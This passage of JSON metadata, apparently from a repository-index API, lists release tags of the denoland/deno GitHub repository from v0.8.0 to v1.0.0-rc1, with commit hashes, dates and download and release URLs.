osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_i